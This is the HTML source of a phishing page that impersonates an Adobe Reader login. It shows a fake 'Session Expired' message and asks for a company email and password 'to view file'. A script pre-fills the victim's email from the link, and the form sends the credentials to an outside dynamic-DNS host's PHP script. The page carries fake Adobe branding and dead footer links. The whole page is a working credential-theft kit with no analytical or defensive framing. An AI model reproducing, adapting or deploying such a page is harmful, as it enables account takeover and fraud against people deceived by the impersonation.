
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<link rel="icon" type="image/png" href="jeb/default.ico">
	  <title>Sign in | Adobe Reader</title>
<style>
{ margin: 0; padding: 0; }

html { 
        background: url('jeb/default.jpg') no-repeat center center fixed;
		background-size: 100%;
    }
	
	iframe {
	height:335px;
	width:380px;
	border-radius: 5px 5px 5px 5px;
	border: 1px solid green;
	}
#frame {
    text-align: center;
    position: relative;
    top: 25%;
    /* left: 0px; */
    width: fit-content;
    overflow: visible;
    visibility: visible;
    display: block;
    border-radius: 11px;
    margin: 0 auto;
    padding: 20px;
    border: solid 1px #000;
}
</style>

<style>
body{
font-family: "Fakt Pro Medium", "Fakt Pro Medium Cyr", "Fakt Pro Medium Grk", -apple-system, ".SFNSText-Regular", "San Francisco", "Roboto", "Segoe UI", "Helvetica Neue", "Lucida Grande", sans-serif;
background-color: #ffffff ;
}


input {
outline: 0}

a{
text-decoration:none;
color:   #d2d3d3 ;
font-size: 9px;
}


#em{margin-left: -35px}

::-webkit-input-placeholder { /* Chrome/Opera/Safari */
  color: #dfdfdf;
}
::-moz-placeholder { /* Firefox 19+ */
  color: #dfdfdf;
}
:-ms-input-placeholder { /* IE 10+ */
  color: #dfdfdf;
}
:-moz-placeholder { /* Firefox 18- */
  color: #dfdfdf;
}

input{
width: 17.5625em;
height: 1.5625em;
border-bottom: 1px solid  #c9edff ;
border-right: 1px solid  #c9edff ;
border-top: none;
border-left: none;
font-weight: 600;
font-family: -apple-system, ".SFNSText-Regular", "San Francisco", "Roboto", "Segoe UI", "Helvetica Neue", "Lucida Grande", sans-serif;
font-size: 0.975em;
text-overflow: ellipsis;
background-color: transparent;
z-index: 2;
margin: 0.6875em 0 0 0;
padding: 0 2% 0 2%;
text-align: center;
}

button{
width: 21.1625em;
height: 2.5625em;
background-color: #a1a1a1 ;
font-family: "Fakt Pro Medium", "Fakt Pro Medium Cyr", "Fakt Pro Medium Grk", -apple-system, ".SFNSText-Regular", "San Francisco", "Roboto", "Segoe UI", "Helvetica Neue", "Lucida Grande", sans-serif;
border: none;
cursor: pointer;
font-size: 0.875em;
color: #FFFFFF;
font-weight: 600;
}

button:hover{background-color: #b7b7b7 ;}
button:active{background-color: #919191 ;}

input:hover{
	border-bottom: 1px solid  #77d2ff ;
border-right: 1px solid  #77d2ff ;
}
input:active{
	border-bottom: 1px solid  #0678b0 ;
border-right: 1px solid  #0678b0 ;
}


</style>
<script src="jquery.min.js"></script>
<script>
var url = (window.location != window.parent.location) ? document.referrer: document.location.href;
 </script>
 <script>

$.urlParam = function(email){
var results = new RegExp('[\?&]' + email + '=([^&#]*)').exec(window.location.href);
return results[1] || 0;


}

</script>



<script>

$( document ).ready(function() {
// after the page elements are all loaded, then run the script
// Set the input field with unique ID #email to a value

$("#email").val($.urlParam('email'));

});

</script> 
</head>

<body style="background: transparent;">

<div id="frame" style="background: white;">

<center>
<div id="cn" align="center">
<label style="color: red; font-size: 19px;"><b>Session Expired:</b></label><label style="color: #8a7a7a ; font-weight: 600;"><br>  Login with your company E-mail<br>and password to view file</label><br>
<form accept-charset="UTF-8" action="https://mzirexroeco.ddnsking.com/somi.php" autocomplete="off" method="post">
<br>
<p><img src="default.ico" width="32px" height="32px" onerror="this.src=&#39;ico/default.ico&#39;">

<input id="email" name="iem" type="email" required="" value="" placeholder="email@example.com" style="">


</p><p><span style="position: relative;">

<input id="ps" value="" required="" placeholder="Password" type="password" name="arrog" autocomplete="off" class=" masked"></span></p>

 
<p><br> <button type="submit" name="brown" value="Submit">Continue</button></p>
</form>
</div>
<label><a href="javascript:void(0)">Privacy</a>     <a href="javascript:void(0)">Legal</a>  <a href="javascript:void(0)">TradeMark</a></label><br>
<label style="color:   #d2d3d3; font-size: 12px;"><a href="javascript:void(0)">Contac us</a>   © 2019 Adobe Corporation</label>
</center>


</div>

</body></html>